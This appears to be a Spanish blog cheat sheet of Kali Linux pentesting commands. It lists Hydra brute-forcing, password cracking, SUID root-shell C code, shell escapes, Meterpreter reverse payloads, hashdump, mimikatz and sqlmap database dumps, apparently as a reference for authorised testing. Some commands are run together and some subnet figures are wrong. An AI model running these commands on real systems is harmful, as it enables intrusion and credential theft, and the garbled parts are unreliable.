El pentesting es la práctica del testeo en sistemas, redes, aplicaciones web… con la finalidad de encontrar vulnerabilidades que un atacante pueda explotar.

A continuación expondremos una cheatsheet (documento para recordar diferentes utilidades) para pentesters que utilizan Kali Linux. El mismo contiene un resumen de las herramientas más importantes que se suelen usar en test de penetración. Algunas de ellas son nmap, sqlmap, ipv4, enumeracion, etc.

Estos parámetros pueden variar dependiendo del sistema operativo que esten usando y la versión de la herramienta. Pero si estan usando Kali-Linux, deberia funcionarles sin problemas.

Reconocimiento y enumeración.

Comandos NMAP.

Nmap («Mapeador de redes») es una herramienta open source que sirve para auditar la seguridad en redes. Algunos administradores de redes la encuentran útil para ver las máquinas de la red, servicios instalados y sus versiones. NMAP utiliza algo llamado Paquetes IP, de forma que determina que hosts hay disponibles en la red, que servicios (nombre de la aplicación y versión), el sistema operativo. Además indica que puertos estan filtrados o tras un firewall, entre otras características.

Corre en todas las computadoras y esta disponible tanto para Linux, como para Windows y Mac OS X

ComandoDescripción
nmap -v -sS -A -T4 targetEscanear en modo verbose (-v), -sS (analiza paquetes TCP syn), -A (detección de servicios y versiones).
nmap -v -sS -p–A -T4 targetEscanea todos los puertos TCP.
nmap -v -sU -sS -p- -A -T4 targetEscanea todos los puertos TCP y UDP (Puede demorar unos minutos).
nmap -v -p 445 –script=smb-check-vulns
–script-args=unsafe=1 192.168.1.X
Comando para escanear servidores vulnerables a SMB. Advertencia: el parámetro unsafe=1 puede causar una caida de la conexión.
ls /usr/share/nmap/scripts/* | grep ftpBuscar palabras claves en el script de NMAP.

Guía completa de NMAP

Enumeración SMB.

En redes de computadoras el Servidor de Mensajes en Bloques (SMB) es una versión de lo que fué conocido como Sistema de Archivos Comunes en Internet (CIFS/SIFS), opera como protocolo de red basado en capa de aplicación principamente utilizado para proveer acceso compartido a archivos, impresoras, puertos series y comunicaciones miscelaneas entre nodos en una red.

ComandoDescripción
nbtscan 192.168.1.0/24Permite descubrir servidores Windows/Samba en una subred, direcciones MAC en Windows, nombres de NetBios y descubrir clientes de Grupos de Trabajo/Dominios.
enum4linux -a target-ipCorre todas las opciones (encontrar clientes de Dominio/Grupo de Trabajo en Windows) aparte de utilizar diccionarios para adivinar nombres compartidos.

Otros métodos de descubrimiento de hosts.

Otros métodos para descubrimiento de hosts sin usar Nmap.

ComandoDescripción
netdiscover -r 192.168.1.0/24Descubre IP, direcciones MAC y fabricante MAC en la misma subred desde la tabla ARP, útil para confirmar que se encuentra en la correcta VLAN del sitio del cliente.

Enumerración SMB.

Enumera servicios compartidos Windows/Samba.

ComandoDescripción
nbtscan 192.168.1.0/24Descubre servidores Windows/Samba en una subred, encontrando direcciones MAC en windows y NetBios como también descubre clientes de Dominio/Grupo de Trabajo.
enum4linux -a target-ipRealiza todo, corre todas las opciones (encontrar Clientes de Dominio/Grupo de Trabajo en Windows) aparte de utilizar diccionarios diccionarios para adivinar nombres compartidos.

Servidor Web Local Python.

Servidor Web Local de comandos Python, práctico para Shells y Exploits en una maquina de ataque.

ComandoDescripción
python -m SimpleHTTPServer 80Ejecuta un servidor HTTP básico, útil para alojar Shells y Exploits.

Montar Archivos Compartidos.

Como montar NFS/CIFS en Windows y Linux.

ComandoDescripción
mount 192.168.1.1:/vol/share /mnt/nfsMonta una carpeta o volúmen en /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Montar carpeta o volúmen Windows CIFS/SMB en Linux /mnt/cifs si quita la contraseña preguntará en la consola de comandos (más seguro para no registrar en bash_history).
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Montar una carpeta o servicio compartido en Windows desde la consola de comandos.
apt-get install smb4k -yInstala smb4k en Kali, útil en el entorno gráfico de Linux para explorar servicios compartidos SMB.

Descubrir Servicios (FingerPrinting) Básico.

Un dispositivo/máquina/navegador Descubridor de Servicios es útil para recopilar información sobre un dispositivo remoto con el proposito de identificarlo.
Descubrir Servicios puede ser utilizado total o parcialmente para identificar usuarios o dispositivos individuales aún cuando las cookies están desactivadas.

ComandoDescripción
nc -v 192.168.1.1 25telnet 192.168.1.1 25Realiza un básico Versionado/Identificador de Servicios mediante un banner.

Enumeración SNMP.

La enumeración SNMP es el proceso de utilizar el protocolo SNMP para enumerar cuentas de usuario en un objetivo.
Emplea dos tipos de componentes Software para la comunicación: el agente SNMP el cual está ubicado en el dispositivo de red y el SNMP administrador, el cual se comunica con el agente.

ComandoDescripción
snmpcheck -t 192.168.1.X -c publicsnmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -fsnmpenum -t 192.168.1.Xonesixtyone -c names -i hosts
Enumeración SNMP.

Transferencia de Zonas DNS.

ComandoDescripción
nslookup -> set type=any -> ls -d blah.comTransferencia de Zona DNS utilizando Windows.
dig axfr blah.com @ns1.blah.comTransferencia de Zona DNS utilizando Linux.

DNSRecon.

DNSRecon dá la posibilidad de:

  1. Comprobar todos los Registros NS para transferencias de Zonas.
  2. Enumera Registros DNS General para un determinado Dominio (MX, SOA, NS, A, AAAA, SPF y TXT)
  3. Realiza una Enumeracion de Registros SRV común. En el Top-Level-Domain (TLD)
  4. Verifica por resolución con comodines.
  5. Fuerza bruta a subdominios y a los registros de host A y AAAA proporcionando un dominio y un diccionario.
  6. Realiza una búsqueda de registros PTR para un Rango IP/CIDR dado.
  7. Verifica registros en la cache del servidor DNS para registros A/AAAA/CNAME previsto en una lista de registros del host en un archivo TXT a comprobar.
  8. Enumerar registros mDNS Comunes en la enumeración local de red y subdominios utilizando Google.
 DNS Enumeration Kali - DNSReconroot:~#
 dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Servidor Web de Enumeración HTTP/HTTPS.

ComandoDescripción
nikto -h 192.168.1.1Realiza un escaneo con NIKTO contra el objetivo.
dirbusterConfigurar mediante interfaz grágica, la línea de comandos la mayor parte del tiempo no funciona.

Inspección de paquetes.

ComandoDescripción
tcpdump tcp port 80 -w output.pcap -i eth0tcpdump por el puerto 80 en la interfaz eth0, con salida a output.pcap

Enumeración de usuarios.

Algunas técnicas para enumerar remotamente usuarios de un sistema.

Enumeración de usuarios SMB.

ComandoDescripción
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
Enumerar usuarios de SMB.
ridenum.py 192.168.XXX.XXX 500 50000 dict.txtRID cycle SMB / Enumerar usuarios de SMB.

Enumeración de usuarios SNMP.

ComandoDescripción
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4
Enumerar usuarios de SNMP.
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
Enumerar usuarios de SNMP.
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
Busca servidores SNMP con Nmap, grepable output

Contraseñas.

Diccionarios.

ComandoDescripción
/usr/share/wordlistsDiccionarios de Kali.

Más diccionarios aquí: g0tm1lk’s blog

Servicios de Fuerza Bruta.

Hydra FTP Fuerza Bruta.

Hydra es un crackeador de inicios de sesión, soporta varios protocolos a atacar. Es rápido y flexible los nuevos módulos son faciles de añadir. Esta herramienta brinda la posibilidad a consultores de seguridad e investigadores verificar lo sencillo que resulta obtener acceso no autorizado a un sistema.
En Ubuntu puede instalarse desde el gestor de paquetes Synaptic.
En Kali, se encuentra instalado.

ComandoDescripción
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Fuerza bruta a FTP con Hydra.

Hydra POP3 Fuerza Bruta.

ComandoDescripción
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
Fuerza bruta a POP3 con hydra.

Hydra SMTP Fuerza Bruta.

ComandoDescripción
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -VFuerza bruta a SMTP con Hydra.

Usa -t para limitar el número de conexiones, ejemplo: -t 15

Guía de crackeo de contraseñas con Hydra aquí

Como romper SSH con Hydra

Crackeo de contraseñas.

John The Ripper – JTR.

Jhon the Ripper es diferente a otras herramientas como Hydra.
Hydra realiza ataques Blind-Brute-Force utilizando combinaciones de Nombre de Usuarios/Contraseñas en un servidor FTP/SSH/Telnet.
Sin embargo Jhon necesita primero el HASH. El mayor desafio para un Hacker es ser el primero en obtener el HASH que será crackeado.
Hoy en día los HASH son crackeables de forma más rapida con el uso de las Rainbow-Tables. Dirigiendose a algún sitio que contenga Rainbow-Tables en línea, enviando el HASH y si coincide el sitio podría mostrar el resultado casi de forma inmediata.
Las Rainbow-Tables basicamente almacenan palabras comunes y sus HASH en una base de datos. Al ser mas grande la base de datos, más palabras abarca.

Comando.Descripción
john –wordlist=/usr/share/wordlists/rockyou.txt hashesJTR crackeo de contraeñas.
john –format=descrypt –wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR crackea utilizando una lista de palabras.
john –format=descrypt hash –showJTR crackea mediante fuerza bruta.

Crackear contraseñas utilizando la guia de JTR

Investigando Exploits.

Formas de encontrar Exploits para Servicios/Host enumerados.

CommandDescription
searchsploit windows 2003 | grep -i localBusca en exploit-db un exploit. En este ejemplo es para escalar privilegios en Windows 2003.
site:exploit-db.com exploit kernel <= 3Utiliza Google para buscar en exploit-db.com un exploit.
grep -R “W7” /usr/share/metasploit-framework
/modules/exploit/windows/*
Busca módulos en MetaSploit utilizando GREP.

Guia completa con capturas de pantallas para buscar Exploits here

Compilando Exploits

Identificando si el código C es para Windows o Linux.

C# indicará que Sistema Operativo debe ser utilizado para construir el Exploit.

ComandoDescripción
process.h, string.h, winbase.h, windows.h, winsock2.hCódigo de Exploit en Windows.
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Código de Exploit en Linux.

Construyendo un Exploit con GCC

Compilar un exploit con Gcc.

ComandoDescripción
gcc -o exploit exploit.cCompilación básica con GCC.

Compilar en Kali 64Bit un exploit para 32Bit con GCC

Util para compilaciones cruzadas de binarios en 32Bit en una maquina de 64Bit.

ComandoDescripción
gcc -m32 exploit.c -o exploitCompilación cruzada de un binario de 32Bit en un Linux de 64Bit.

Compilar un .exe en Linux

Construir/compilar exploits para Windows en Linux, resultando en un archivo .exe

ComandoDescripción
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exeCompilar .exe en Linux.

Binario SUID

A veces los archivos binarios C SUID son requeridos para obtener una Shell como SuperUsuario, actualizando el UID/GID y la shell son requeridos.
Debajo hay algunos ejemplos rápidos de varias shells:

SUID C Shell para/bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell para /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Construyendo el binario para la Shell SUID

gcc -o suid suid.c

Para 32 bit:

gcc -m32 -o suid suid.c

TTY Shells.

Trucos para obtener una TTY-Shell desde una shell limitada; útil para lanzar comandos como «SU» desde shells reversas.

TTY-Shell en Python.

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Obtener una Shell-Interactiva.

/bin/sh -i

Obtener una Shell-TTY con Perl.

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Obtener una Shell-TTY con Ruby.

exec "/bin/sh"

Obtener una Shell-TTY con Lua.

os.execute('/bin/sh')

Obtener una Shell-TTY desde el editor Vi.

Lanzar comandos en la shell desde Vi:

:!bash

Obtener una Shel-TTY con Nmap.

!sh

Metasploit

Metasploit fue creado por H.D.Moore en 2003 como una herramienta de red portable usando Perl. En el 2007, el Framework de Metasploit fue totalmente re-escrito en Ruby. El 21 de Octubre de 2009, el proyecto Metasploit anunció que fue adquirido por Rapid7, una compañia de seguridad que provee soluciones centralizadas y unificadas de vulnerabilidad.

Al ser un producto comercial comparable a Immunity’s Canvas o Core Security Tecnologies o Core Impact, Metasploit puede ser utilizado para verificar la vulnerabilidad de un sistema o para penetrar en sistemas remotos. Como muchas herramientas de seguridad para obtener información, Metasploit puede utilizarse para legitimar y desautorizar actividades. Desde la adquisición del Framework Metasploit, Rapid7 a añadido dos ediciones propietarias llamadas Metasploit Express y Metasploit Pro.

La posición emergente de Metasploit como marco de desarrollo de la explotación hacia la publicación de avisos de vulnerabilidades en el software a veces acompañado por un modulo de terceros para Metasploit que resalta la explotabilidad, riesgo y corrección del bug.
Metasploit 3.0 comenzó a incluir herramientas de ofuscación, usadas para descubrir vulnerabilidades en el software, mas bien para explotar los bugs conocidos.
Metasploit 3.0 incluye una intergración de herramientas Lorcon para Wireless (802.11) publicado en Noviembre del 2006.
Metasploit 4.0 fue lanzado en Agosto del 2011.

Meterpreter Payloads.

Windows reverse meterpreter payload.

ComandoDescripción
set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload.

Windows VNC Meterpreter payload.

ComandoDescripción
set payload windows/vncinject/reverse_tcpset ViewOnly falseMeterpreter Windows VNC Payload.

Linux Reverse Meterpreter payload.

ComandoDescripción
set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload.

Trucos Meterpreter.

Comandos útiles de meterpreter.

ComandoDescripción
upload file c:\\windowsMeterpreter para subir archivo a un objetivo Windows.
download c:\\windows\\repair\\sam /tmpMeterpreter para bajar archivo desde un objetivo Windows.
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exeLanzar un .exe Meterpreter en el objetivo (útil para ejecutar exploits subidos).
execute -f cmd -cCrear nuevos canales con la Shell-Cmd.
psMeterpreter muestra los procesos.
shellMeterpreter obtiene una shell en el objetivo.
getsystemMeterpreter intenta escalar privilegios en el objetivo.
hashdumpMeterpreter intenta volcar los hashes en el objetivo.
portfwd add –l 3389 –p 3389 –r targetMeterpreter crea una redirección de puertos hacia el objetivo.
portfwd delete –l 3389 –p 3389 –r targetMeterpreter elimina la redirección de puertos.

Módulos comunes de Metasploit.

Exploits Remotos para Windows (exploits).

ComandoDescripción
use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Exploits Locales para Windows (exploits).

ComandoDescripción
use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64

Módulos Auxiliares de Metasploit.

ComandoDescripción
use auxiliary/scanner/http/dir_scannerMódulo escaner de directorios HTTP.
use auxiliary/scanner/http/jboss_vulnscanMódulo escaner de vulnerabilidades JBOSS.
use auxiliary/scanner/mssql/mssql_loginMódulo escaner de credencial MSSQL.
use auxiliary/scanner/mysql/mysql_versionMódulo escaner de versión MSSQL.
use auxiliary/scanner/oracle/oracle_loginMódulo de login para Oracle.

Modulos de Metasploit para Powershell.

ComandosDescripción
use exploit/multi/script/web_deliveryMódulo de entrega del Payload para Powershell.
post/windows/manage/powershell/exec_powershellMódulo para subir y ejecutar una powershell a traves de una sesión.
use exploit/multi/http/jboss_maindeployerMódulo para desarrollar JBOSS.
use exploit/windows/mssql/mssql_payloadMódulo para MSSQL.

Módulos Metasploit para la Post-Explotación en Windows.

ComandosDescripción
run post/windows/gather/win_privsMuestra los privilegios del usuario actual.
use post/windows/gather/credentials/gppMódulo grab GPP para guardar contraseñas.
load mimikatz -> wdigestMódulo para cargar Mimikatz.
run post/windows/gather/local_admin_search_enumIdentificar otros equipos indicando el nombre de usuario del dominio muestra el acceso administrativo que tiene.

Redes.

Identificando Servicios TTL.

Sistema OperativoTamaño TTL
Windows128
Linux64
Solaris255
Cisco / Network255

IPv4

Clase de rangos IP.

Ejemplo: Clasae A,B,C.

ClaseRango de direcciones IP
Class A IP Address Range0.0.0.0 – 127.255.255.255
Class B IP Address Range128.0.0.0 – 191.255.255.255
Class C IP Address Range192.0.0.0 – 223.255.255.255
Class D IP Address Range224.0.0.0 – 239.255.255.255
Class E IP Address Range240.0.0.0 – 255.255.255.255

Rango de direcciones IPv4 privadas.

ClaseRango
Class A Private Address Range10.0.0.0 – 10.255.255.255
Class B Private Address Range172.16.0.0 – 172.31.255.255
Class C Private Address Range192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255

Subneteo IPv4.

CIDRMáscara de subred en decimal.Numeros de Hosts.
/31255.255.255.2541 Host
/30255.255.255.2522 Hosts
/29255.255.255.2496 Hosts
/28255.255.255.24014 Hosts
/27255.255.255.22430 Hosts
/26255.255.255.19262 Hosts
/25255.255.255.128126 Hosts
/24255.255.255.0254 Hosts
/23255.255.254.0512 Host
/22255.255.252.01022 Hosts
/21255.255.248.02046 Hosts
/20255.255.240.04094 Hosts
/19255.255.224.08190 Hosts
/18255.255.192.016382 Hosts
/17255.255.128.032766 Hosts
/16255.255.0.065534 Hosts
/15255.254.0.0131070 Hosts
/14255.252.0.0262142 Hosts
/13255.248.0.0524286 Hosts
/12255.240.0.01048674 Hosts
/11255.224.0.02097150 Hosts
/10255.192.0.04194302 Hosts
/9255.128.0.08388606 Hosts
/8255.0.0.016777214 Hosts

Tabla ASCII

Util para Testeos de Intrusión en Aplicaciones Web.

ASCIICaracter
x00Null Byte
x08BS
x09TAB
x0aLF
x0dCR
x1bESC
x20SPC
x21!
x22
x23#
x24$
x25%
x26&
x27`
x28(
x29)
x2a*
x2b+
x2c,
x2d
x2e.
x2f/
x300
x311
x322
x333
x344
x355
x366
x377
x388
x399
x3a:
x3b;
x3c<
x3d=
x3e>
x3f?
x40@
x41A
x42B
x43C
x44D
x45E
x46F
x47G
x48H
x49I
x4aJ
x4bK
x4cL
x4dM
x4eN
x4fO
x50P
x51Q
x52R
x53S
x54T
x55U
x56V
x57W
x58X
x59Y
x5aZ
x5b[
x5c\
x5d]
x5e^
x5f_
x60`
x61a
x62b
x63c
x64d
x65e
x66f
x67g
x68h
x69i
x6aj
x6bk
x6cl
x6dm
x6en
x6fo
x70p
x71q
x72r
x73s
x74t
x75u
x76v
x77w
x78x
x79y
x7az

Comandos CISCO-IOS.

Coleccion de comandos útiles para Cisco IOS.

ComandoDescripción
enableIngresa al modo de configuración.
conf tModo corto para configurar mediante terminal.
(config)# interface fa0/0Configurar FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255Asigna ip a fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255Asigna ip a fa0/0
(config-if)# line vty 0 4Configura linea VTY.
(config-line)# loginCisco set telnet password
(config-line)# password YOUR-PASSWORDEstablecer contraeña para Telnet.
# show running-configMuestra el running-config cargado en memoria.
# show startup-configMuestra la configuración del inicio.
# show versionMuestra la versión IOS de Cisco.
# show sessionMuestra las sesiones abiertas.
# show ip interfaceMuestra la dirección Ip de las interfaces.
# show interface e0Muestra información detallada de la interfaz e0.
# show ip routeMuestra las tablas de rutas.
# show access-listsMuestra el access-list.
# dir file systemsMuestra los archivos del sistema.
# dir all-filesystemsMuestra todos los archivos del sistema.
# dir /allMuestra archivos eliminados.
# terminal length 0Salida de la terminal sin límite (cache).
# copy running-config tftpCopia la running-config a un servidor tftp.
# copy running-config startup-configCopia la startup-config a la running-config.

Criptografía.

Longitud de Hash.

HashTamaño
MD5 Hash Length16 Bytes
SHA-1 Hash Length20 Bytes
SHA-256 Hash Length32 Bytes
SHA-512 Hash Length64 Bytes

Ejemplos de Hash.

hash-identifier permite identificar el tipo de hash, la siguiente lista contiene numerosos ejemplos:

HashEjemplo
MD5 Hash8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASSf0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hashb89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASScac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALTc73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASSeb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617
SHA-51282a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALTe5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a
NTLM Hashb4b9b02e6f09a9bd760f388b67351e2b

Guía de identificación de HASH y cracking de contraseñas con Wireshark aquí

Ejemplos de SQLMap.

Sqlmap es una herramienta open source para tests de penetración que automatiza el proceso de detección y explotación de vulnerabilidades de inyección SQL y la apropiación de servidores de bases de datos.

Tiene un potente motor de detección, muchas características actualizadas y una amplia gama de opciones que van desde la identificación de la base de datos, recolección de datos, acceso al sistema de archivos y la ejecución de comandos en el sistema operativo de forma remota.

ComandoDescripción
sqlmap -u http://meh.com –forms –batch –crawl=10
–cookie=jsessionid=54321 –level=5 –risk=3
Escaner automático.
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE
–level=3 –current-user –current-db –passwords
–file-read=”/var/www/blah.php”
Escanear un objetivo determinado.
sqlmap -u “http://meh.com/meh.php?id=1”
–dbms=mysql –tech=U –random-agent –dump
Escaneo de url para inyecciones union + error based con mysql como
backend y usando un user agent aleatorio + database dump
sqlmap -o -u “http://meh.com/form/” –formsVerifica un formulario para una inyección con SqlMap.
sqlmap -o -u “http://meh/vuln-form” –forms
-D database-name -T users –dump
Mostrar y crackear los hashs para la tabla usuarios en la base de datos.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *